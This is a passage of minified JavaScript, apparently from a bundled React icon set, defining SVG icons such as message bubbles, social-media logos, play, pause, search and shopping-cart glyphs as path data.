2.75 0 0 0 22.75 15V6A2.75 2.75 0 0 0 20 3.25H4ZM9 10a1 1 0 0 0-2 0v1a1 1 0 1 0 2 0v-1Zm3-1a1 1 0 0 1 1 1v1a1 1 0 1 1-2 0v-1a1 1 0 0 1 1-1Zm5 1a1 1 0 1 0-2 0v1a1 1 0 1 0 2 0v-1Z",clipRule:"evenodd"})),messege_comment_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9Z"})),messege_comment_5_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M21.75 12A9.75 9.75 0 0 1 12 21.75H3a.75.75 0 0 1-.75-.75v-9c0-5.385 4.365-9.75 9.75-9.75s9.75 4.365 9.75 9.75ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_6_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M17 3.25A5.75 5.75 0 0 1 22.75 9v7a.75.75 0 0 1-.75.75h-5.31a4.75 4.75 0 0 1-4.69 4H2a.75.75 0 0 1-.75-.75v-6a4.751 4.751 0 0 1 4-4.691V9A5.75 5.75 0 0 1 11 3.25h6ZM5.25 10.838A3.25 3.25 0 0 0 2.75 14v5.25H12a3.25 3.25 0 0 0 3.162-2.5H11A5.75 5.75 0 0 1 5.25 11v-.162ZM11 10.75a1 1 0 1 0 0 2h6a1 1 0 1 0 0-2h-6Zm0-3.5a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-4Z",clipRule:"evenodd"})),messege_comment_7_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M22.75 11.5c0 5.218-4.932 9.25-10.75 9.25-.921 0-1.817-.101-2.672-.29l-2.956 1.691A.75.75 0 0 1 5.25 21.5v-2.8c-2.411-1.675-4-4.258-4-7.2 0-5.218 4.932-9.25 10.75-9.25s10.75 4.032 10.75 9.25ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2 2.5a1 1 0 1 1 0 2h-4a1 1 0 1 1 0-2h4Z",clipRule:"evenodd"})),messege_comment_8_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M14.5 3.25c4.542 0 8.25 3.613 8.25 8.102 0 2.519-1.172 4.764-3 6.247V20a.75.75 0 0 1-1.163.626l-2.13-1.404a8.41 8.41 0 0 1-1.957.231 8.323 8.323 0 0 1-4.61-1.382 7.867 7.867 0 0 1-3.075-.06l-1.82 1.127A.75.75 0 0 1 3.85 18.5v-1.87c-1.576-1.222-2.6-3.07-2.6-5.157C1.25 7.7 4.557 4.75 8.5 4.75c.319 0 .634.02.942.057a.755.755 0 0 1 .15.033A8.318 8.318 0 0 1 14.5 3.25ZM8.08 6.265c-3.03.195-5.33 2.505-5.33 5.208 0 1.68.878 3.196 2.276 4.162a.75.75 0 0 1 .324.617v.903l.943-.583a.75.75 0 0 1 .587-.086c.45.12.925.188 1.416.203A7.98 7.98 0 0 1 8.08 6.265Z",clipRule:"evenodd"})),messenger_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M1.25 11.677C1.25 5.687 5.945 1.25 12 1.25s10.75 4.44 10.75 10.43c0 5.99-4.695 10.427-10.75 10.427a11.75 11.75 0 0 1-3.112-.414.864.864 0 0 0-.575.043l-2.134.94a.86.86 0 0 1-1.207-.76l-.059-1.913a.85.85 0 0 0-.288-.613c-2.09-1.87-3.375-4.58-3.375-7.713Zm7.452-1.959-3.157 5.01c-.304.48.287 1.02.739.677l3.391-2.575a.644.644 0 0 1 .777-.003l2.513 1.884a1.612 1.612 0 0 0 2.332-.43l3.161-5.006c.301-.481-.29-1.024-.742-.68l-3.391 2.574a.644.644 0 0 1-.777.003l-2.513-1.884a1.613 1.613 0 0 0-2.333.43Z",clipRule:"evenodd"})),microsoft_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.25 2.25v9h-9V5A2.75 2.75 0 0 1 5 2.25h6.25Zm1.5 0v9h9V5A2.75 2.75 0 0 0 19 2.25h-6.25Zm9 10.5h-9v9H19A2.75 2.75 0 0 0 21.75 19v-6.25Zm-10.5 9v-9h-9V19A2.75 2.75 0 0 0 5 21.75h6.25Z"})),middle_align_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm-5 18a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h8Zm5-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm-5-6a1 1 0 1 1 0 2H8a1 1 0 0 1 0-2h8Z"})),mobile_smartphone_phone_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M17 22.75A2.75 2.75 0 0 0 19.75 20V4A2.75 2.75 0 0 0 17 1.25H7A2.75 2.75 0 0 0 4.25 4v16A2.75 2.75 0 0 0 7 22.75h10ZM13.5 4a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"})),pause_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M2.25 5A2.75 2.75 0 0 1 5 2.25h2.5A2.75 2.75 0 0 1 10.25 5v14a2.75 2.75 0 0 1-2.75 2.75H5A2.75 2.75 0 0 1 2.25 19V5Zm11.5 0a2.75 2.75 0 0 1 2.75-2.75H19A2.75 2.75 0 0 1 21.75 5v14A2.75 2.75 0 0 1 19 21.75h-2.5A2.75 2.75 0 0 1 13.75 19V5Z",clipRule:"evenodd"})),pinterest_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 4.554 2.833 8.448 6.832 10.014-.094-.85-.178-2.159.038-3.087.195-.84 1.26-5.344 1.26-5.344s-.321-.644-.321-1.596c0-1.495.866-2.61 1.945-2.61.917 0 1.36.688 1.36 1.514 0 .922-.587 2.301-.89 3.579-.254 1.07.536 1.943 1.592 1.943 1.91 0 3.379-2.015 3.379-4.923 0-2.574-1.85-4.374-4.49-4.374-3.06 0-4.855 2.295-4.855 4.665 0 .925.356 1.915.8 2.454.088.106.101.2.075.308-.082.34-.263 1.07-.298 1.22-.047.196-.156.238-.36.143-1.343-.625-2.182-2.588-2.182-4.165 0-3.39 2.464-6.505 7.103-6.505 3.729 0 6.627 2.657 6.627 6.209 0 3.705-2.336 6.686-5.578 6.686-1.09 0-2.114-.566-2.464-1.234 0 0-.54 2.053-.67 2.555-.243.934-.898 2.105-1.336 2.819A10.76 10.76 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Z"})),play_media_video_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.936 0 10.75-4.813 10.75-10.75S17.936 1.25 12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75ZM10.416 7.376A.75.75 0 0 0 9.25 8v8a.75.75 0 0 0 1.166.624l6-4a.75.75 0 0 0 0-1.248l-6-4Z",clipRule:"evenodd"})),price_tag_label_category_sale_discount_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M21.444 13.616a2.75 2.75 0 0 0 .806-1.944V3.5a1.75 1.75 0 0 0-1.75-1.75h-8.172c-.73 0-1.429.29-1.945.806l-8 8a2.75 2.75 0 0 0 0 3.888l7.172 7.172a2.75 2.75 0 0 0 3.889 0l8-8ZM8.707 12.293a1 1 0 1 0-1.414 1.414l3 3 .076.068a1 1 0 0 0 1.406-1.406l-.068-.076-3-3ZM18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),price_tag_offer_sale_coupon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M18.796 6.963c-.367 1.048-1.172 1.993-2.432 2.693a.75.75 0 1 1-.728-1.311c.99-.55 1.517-1.229 1.744-1.878a2.583 2.583 0 0 0-.1-1.941c-.55-1.208-1.999-2.11-3.853-1.618-2.791.74-6.15 1.333-9.695-.024a.75.75 0 1 1 .536-1.401c3.09 1.183 6.062.695 8.774-.025 2.566-.68 4.75.577 5.603 2.445.425.933.517 2.017.151 3.06Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M19.74 7.294c-.46 1.313-1.45 2.436-2.89 3.236a1.75 1.75 0 1 1-1.7-3.06c.81-.45 1.152-.95 1.286-1.333a1.59 1.59 0 0 0-.066-1.197 1.835 1.835 0 0 0-.101-.19h-4.44c-.73 0-1.43.29-1.945.805l-6.5 6.5a2.75 2.75 0 0 0 0 3.89l6.171 6.171a2.75 2.75 0 0 0 3.89 0l6.5-6.5a2.75 2.75 0 0 0 .805-1.944V6.5c0-.598-.3-1.127-.759-1.442.083.73.01 1.49-.252 2.236Zm-8.71 5.176a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06-1.06l-2-2Zm-2.5 1.5a.75.75 0 0 0-1.06 1.06l3 3a.75.75 0 0 0 1.06-1.06l-3-3Z",clipRule:"evenodd"})),reddit_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M13.875 4.75h2.354a2.751 2.751 0 1 0 0-1.5h-2.354A2.75 2.75 0 0 0 11.125 6v2.028c-1.76.115-3.39.571-4.771 1.281a2.875 2.875 0 1 0-3.964 4.109A5.777 5.777 0 0 0 2 15.5C2 19.642 6.477 23 12 23s10-3.358 10-7.5c0-.722-.136-1.421-.39-2.082a2.875 2.875 0 1 0-3.963-4.109C16.2 8.566 14.48 8.1 12.624 8.014V6c0-.69.56-1.25 1.25-1.25ZM9 14.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm0 2.97a.75.75 0 0 0-1.06 1.06c.954.955 2.57 1.345 4.03 1.345 1.46 0 3.075-.39 4.03-1.345a.75.75 0 0 0-1.06-1.06c-.546.545-1.68.905-2.97.905-1.29 0-2.424-.36-2.97-.905ZM16.5 13a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),refresh_reset_cycle_loop_infinity_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 21v-5a1 1 0 0 1 1-1h5a1 1 0 1 1 0 2H5.756A7.977 7.977 0 0 0 12 20a8 8 0 0 0 8-8 1 1 0 1 1 2 0c0 5.523-4.477 10-10 10a9.967 9.967 0 0 1-7-2.863V21a1 1 0 1 1-2 0Zm-1-9C2 6.477 6.477 2 12 2a9.966 9.966 0 0 1 7 2.86V3a1 1 0 1 1 2 0v5a1 1 0 0 1-1 1h-5a1 1 0 1 1 0-2h3.245A8 8 0 0 0 4 12a1 1 0 1 1-2 0Z"})),restriction_no_stop_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM6.383 19.03A9 9 0 0 0 19.03 6.383L6.383 19.03ZM12 3a9 9 0 0 0-7.031 14.616L17.616 4.97A8.96 8.96 0 0 0 12 3Z",clipRule:"evenodd"})),right_align_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm0 18a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Zm0-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm0-6a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Z"})),right_triangle_angle_play_arrow_forward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M6.25 5c0-1.442 1.646-2.265 2.8-1.4l9.334 7c.933.7.933 2.1 0 2.8l-9.334 7c-1.154.865-2.8.042-2.8-1.4V5Z"})),search_magnify_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M16.618 18.032a9 9 0 1 1 1.414-1.414l3.675 3.675a1 1 0 0 1-1.414 1.414l-3.675-3.675ZM4 11a7 7 0 1 1 12.042 4.856 1.006 1.006 0 0 0-.186.186A7 7 0 0 1 4 11Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M10 6.5a1 1 0 0 1 1-1 5.5 5.5 0 0 1 5.5 5.5 1 1 0 1 1-2 0A3.5 3.5 0 0 0 11 7.5a1 1 0 0 1-1-1Z",clipRule:"evenodd"})),settings_tool_function_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15.183 2.612a1.75 1.75 0 0 0-1.706-1.362h-2.953a1.75 1.75 0 0 0-1.706 1.362l-.355 1.562a1.25 1.25 0 0 1-1.587.918L5.25 4.59a1.75 1.75 0 0 0-2.021.782L1.772 7.837a1.75 1.75 0 0 0 .338 2.193l1.16 1.04a1.25 1.25 0 0 1 0 1.862L2.11 13.97a1.75 1.75 0 0 0-.337 2.193l1.455 2.464a1.751 1.751 0 0 0 2.021.783l1.628-.5a1.25 1.25 0 0 1 1.586.917l.355 1.56a1.75 1.75 0 0 0 1.707 1.363h2.952a1.75 1.75 0 0 0 1.706-1.362l.355-1.56a1.25 1.25 0 0 1 1.586-.919l1.628.501a1.75 1.75 0 0 0 2.02-.783l1.457-2.464a1.75 1.75 0 0 0-.34-2.193l-1.157-1.038a1.25 1.25 0 0 1 0-1.863l1.159-1.039a1.75 1.75 0 0 0 .338-2.193l-1.456-2.464a1.75 1.75 0 0 0-2.02-.782l-1.629.5a1.25 1.25 0 0 1-1.586-.917l-.355-1.562ZM15 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0Z",clipRule:"evenodd"})),share_social_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"m9.075 9.42 5.865-2.933a3.45 3.45 0 1 1 1.005 1.734l-5.976 2.988a3.915 3.915 0 0 1 0 1.583l5.976 2.987a3.45 3.45 0 1 1-1.005 1.734L9.074 14.58a3.9 3.9 0 1 1 0-5.16Z",clipRule:"evenodd"})),shopping_cart_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M9.75 19.25a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm9.75 0a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm1.5 0a2.5 2.5 0 1 1-4.79-1h-5.17a2.5 2.5 0 1 1-4.33-.442 1.745 1.745 0 0 1-.572-1.069L4.376 3.966a.25.25 0 0 0-.247-.216H2a.75.75 0 0 1 0-1.5h2.129a1.75 1.75 0 0 1 1.733 1.51l.068.49h14.874a1.75 1.75 0 0 1 1.722 2.06l-1.152 6.403a1.75 1.75 0 0 1-1.572 1.434l-12.36 1.067.182 1.32a.25.25 0 0 0 .247.216H18.5a2.5 2.5 0 0 1 2.5 2.5Z"})),skype_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M7.5 1.25a6.25 6.25 0 0 0-5.197 9.723 9.75 9.75 0 0 0 10.724 10.724 6.25 6.25 0 0 0 8.67-8.67A9.75 9.75 0 0 0 10.973 2.303 6.224 6.224 0 0 0 7.5 1.25Zm4.5 6C9.8 7.25 8.25 8.4 8.25 10c0 1.015.647 1.627 1.337 1.991.644.34 1.468.546 2.178.723l.053.014c.778.194 1.429.361 1.894.607.435.23.538.43.538.665 0 .4-.45 1.25-2.25 1.25S9.75 14.4 9.75 14a.75.75 0 0 0-1.5 0c0 1.6 1.55 2.75 3.75 2.75s3.75-1.15 3.75-2.75c0-1.015-.647-1.627-1.337-1.991-.644-.34-1.468-.546-2.178-.723l-.053-.014c-.778-.194-1.429-.361-1.894-.607-.435-.23-.538-.43-.538-.665 0-.4.45-1.25 2.25-1.25s2.25.85 2.25 1.25a.75.75 0 0 0 1.5 0c0-1.6-1.55-2.75-3.75-2.75Z",clipRule:"evenodd"})),smile_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7.5a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm-7.556 6.275a.75.75 0 1 0-1.43.45 5.752 5.752 0 0 0 10.973 0 .75.75 0 1 0-1.431-.45 4.252 4.252 0 0 1-8.112 0Z",clipRule:"evenodd"})),social_community_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.75a3.384 3.384 0 0 1 3.238 2.408C18.858 5.46 21.4 8.895 21.4 13c0 .506-.039 1.002-.113 1.486a3.388 3.388 0 0 1 1.463 2.791 3.386 3.386 0 0 1-4.785 3.085A9.3 9.3 0 0 1 12 22.5a9.302 9.302 0 0 1-5.965-2.138 3.386 3.386 0 0 1-4.785-3.085c0-1.156.579-2.179 1.463-2.79A9.77 9.77 0 0 1 2.6 13c0-4.105 2.543-7.54 6.162-8.841A3.384 3.384 0 0 1 12 1.75ZM19.4 13c0-2.998-1.707-5.533-4.22-6.704A3.383 3.383 0 0 1 12 8.527a3.383 3.383 0 0 1-3.18-2.231C6.307 7.467 4.6 10.002 4.6 13c0 .301.017.598.05.889a3.385 3.385 0 0 1 3.363 3.388c0 .63-.172 1.221-.471 1.727A7.322 7.322 0 0 0 12 20.5a7.321 7.321 0 0 0 4.458-1.495 3.384 3.384 0 0 1-.47-1.728 3.385 3.385 0 0 1 3.361-3.388c.034-.291.05-.588.05-.889Z",clipRule:"evenodd"})),square_rounded_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19V5A2.75 2.75 0 0 1 5 2.25h14A2.75 2.75 0 0 1 21.75 5v14Z"})),star_rating_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M10.3 2.793c.67-1.443 2.73-1.443 3.4 0l2.136 4.602a.294.294 0 0 0 .232.166l5.068.596c1.578.186 2.232 2.136 1.05 3.222l-3.748 3.444a.28.28 0 0 0-.087.261l.995 4.975c.315 1.574-1.369 2.76-2.75 1.99l-4.45-2.474a.3.3 0 0 0-.291 0l-4.45 2.475c-1.382.768-3.065-.417-2.75-1.991l.995-4.975a.28.28 0 0 0-.087-.26l-3.748-3.445c-1.182-1.086-.529-3.036 1.05-3.222l5.067-.596a.293.293 0 0 0 .232-.166L10.3 2.793Z"})),stopwatch_reading_time_timer_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15 1.5a1 1 0 0 0-1-1h-4a1 1 0 1 0 0 2h1v.8c-4.915.502-8.75 4.653-8.75 9.7 0 5.385 4.365 9.75 9.75 9.75s9.75-4.365 9.75-9.75c0-5.047-3.835-9.198-8.75-9.7v-.8h1a1 1 0 0 0 1-1Zm-4 6a1 1 0 1 1 2 0v4.985l3.081 2.202.08.063a1 1 0 0 1-1.156 1.62l-.086-.056-3.5-2.5A1 1 0 0 1 11 13V7.5Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M18.293 3.293a1 1 0 0 1 1.414 0l2 2 .068.076a1 1 0 0 1-1.406 1.406l-.076-.068-2-2a1 1 0 0 1 0-1.414Z"})),tablet_ipad_pad_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M18 22.75A2.75 2.75 0 0 0 20.75 20V4A2.75 2.75 0 0 0 18 1.25H6A2.75 2.75 0 0 0 3.25 4v16A2.75 2.75 0 0 0 6 22.75h12ZM12.01 4a1 1 0 1 1 0 2C11.457 6 11 5.552 11 5s.457-1 1.01-1Z",clipRule:"evenodd"})),tag_bookmark_save_favourite_mark_discount_solid_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M20.75 22a.75.75 0 0 1-1.2.6l-6.8-5.1a1.25 1.25 0 0 0-1.415-.059l-.085.059-6.8 5.1a.75.75 0 0 1-1.2-.6V4A2.75 2.75 0 0 1 6 1.25h12A2.75 2.75 0 0 1 20.75 4v18Z"})),tiktok_logo_icon_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm2.364 5.25a1 1 0 1 0-2 0v7.792a2.195 2.195 0 0 1-2.182 2.208A2.195 2.195 0 0 1 8 14.292c0-1.228.985-2.209 2.182-2.209a1 1 0 1 0 0-2C7.864 10.083 6 11.975 6 14.292c0 2.316 1.864 4.208 4.182 4.208 2.317 0 4.182-1.892 4.182-4.208V9.934a4.74 4.74 0 0 0 2.636.774 1 1 0 1 0 0-2c-1.713 0-2.636-1.377-2.636-2.208Z",clipRule:"evenodd"})),tiktok_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19 21.75A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14ZM6 14.292c0-2.316 1.864-4.209 4.182-4.209a1 1 0 0 1 0 2c-1.197 0-2.182.982-2.182 2.209s.985 2.208 2.182 2.208 2.181-.98 2.181-2.208V6.5a1 1 0 0 1 2 0c0 .83.924 2.208 2.637 2.208a1 1 0 0 1 0 2 4.738 4.738 0 0 1-2.637-.776v4.36c0 2.316-1.864 4.208-4.181 4.208C7.864 18.5 6 16.608 6 14.292Z",clipRule:"evenodd"})),triangle_rounded_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632Z",clipRule:"evenodd"})),triangle_shape_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 2.25a.75.75 0 0 1 .646.37l10 17A.75.75 0 0 1 22 20.75H2a.75.75 0 0 1-.646-1.13l10-17A.75.75 0 0 1 12 2.25Z",clipRule:"evenodd"})),twitter_x_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M20.292 2.293a1.001 1.001 0 0 1 1.415 1.414l-7.125 7.124 7.026 9.73A.751.751 0 0 1 21 21.75h-5a.751.751 0 0 1-.608-.311l-4.789-6.63-6.896 6.897a1 1 0 0 1-1.414-1.415l7.124-7.125L2.392 3.44A.751.751 0 0 1 3 2.25h5l.09.005a.751.751 0 0 1 .518.306l4.787 6.628 6.897-6.896Z",clipRule:"evenodd"})),upload_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.47 12.47a.75.75 0 0 1 1.06 0l2.5 2.5a.75.75 0 0 1-.53 1.28h-1.75V21a.75.75 0 0 1-1.5 0v-4.75H9.5a.75.75 0 0 1-.53-1.28l2.5-2.5Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"m23.67 11.663-.015-.03-.032-.06-.007-.013a18.339 18.339 0 0 0-.72-1.217 20.43 20.43 0 0 0-2.224-2.856C18.733 5.42 15.799 3.25 12 3.25c-3.8 0-6.734 2.17-8.672 4.237a20.43 20.43 0 0 0-2.796 3.801 11.69 11.69 0 0 0-.149.272l-.007.014-.032.06-.015.03a.76.76 0 0 0 0 .673l.015.03.032.06.007.013a18.262 18.262 0 0 0 .72 1.217 20.432 20.432 0 0 0 2.225 2.856C5.266 18.58 8.2 20.75 12 20.75c3.8 0 6.733-2.17 8.672-4.237a20.433 20.433 0 0 0 2.795-3.801c.065-.115.115-.208.149-.272l.007-.013.02-.037.012-.024.015-.03a.756.756 0 0 0 0-.673ZM12 5.75a4.25 4.25 0 1 1 0 8.5 4.25 4.25 0 0 1 0-8.5Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"m.33 11.664.015-.03.032-.06.007-.014a18.263 18.263 0 0 1 .72-1.217 20.43 20.43 0 0 1 2.224-2.856C5.268 5.42 8.201 3.25 12 3.25c3.8 0 6.734 2.17 8.672 4.237a20.425 20.425 0 0 1 2.796 3.801c.065.115.115.208.149.272l.007.014.032.06.014.03a.75.75 0 0 1 .001.672l-.015.03a5.739 5.739 0 0 1-.032.06l-.007.014a18.252 18.252 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.225 2.856C18.734 18.58 15.8 20.75 12 20.75c-3.8 